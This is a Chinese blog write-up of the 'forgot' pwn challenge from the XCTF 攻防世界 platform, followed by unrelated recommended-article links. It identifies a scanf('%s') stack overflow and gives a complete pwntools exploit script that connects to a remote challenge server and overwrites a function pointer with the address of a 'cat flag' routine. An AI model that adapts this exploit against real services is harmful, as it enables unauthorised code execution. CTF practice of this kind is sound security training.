攻防世界2

forgot

发现是32位文件

fgets(s, 32, stdin)限制读入32位字符,无法利用

__isoc99_scanf("%s", v2) 典型的栈溢出

发现cat flag

覆盖v2-v3,覆盖为cat flag的函数地址

exp:

python 复制代码
from pwn import *
context(os='linux',arch='amd64',log_level='debug')
io = remote('61.147.171.105','56662')
door = 0x80486CC
io.recvuntil(b'>')
payload = b'aaaa'
io.sendline(payload)
io.recvuntil(b'>')
padding = b'a'*(0x74-0x54+0x4)
payload1 = padding + p32(door)
io.sendline(payload1)
io.interactive()
相关推荐
mucheni16 小时前
迅为RK3588开发板Ubuntu 系统开发ubuntu终端密码登录
linux·运维·ubuntu
ZKNOW甄知科技16 小时前
客户案例 | 派克新材x甄知科技,构建全场景智能IT运维体系
大数据·运维·人工智能·科技·低代码·微服务·制造
skywoodsky16 小时前
Ubuntu 24.04环境下的挂起转休眠
linux
小云数据库服务专线16 小时前
GaussDB 应用侧报Read timed out解决方法
linux·服务器·gaussdb
资源补给站16 小时前
服务器高效操作指南:Python 环境退出与 Linux 终端快捷键全解析
linux·服务器·python
一苓二肆16 小时前
代码加密技术
linux·windows·python·spring·eclipse
玉树临风江流儿16 小时前
Linux驱动开发实战指南-上
linux·驱动开发
山塘小鱼儿16 小时前
open-webui docker高速下载&本地部署
运维·docker·容器
木欣欣粉皮17 小时前
Ubuntu使用图片
linux·ubuntu
迎風吹頭髮17 小时前
Linux服务器编程实践27-详解TCP状态转移:从LISTEN到TIME_WAIT的完整路径
linux·服务器·网络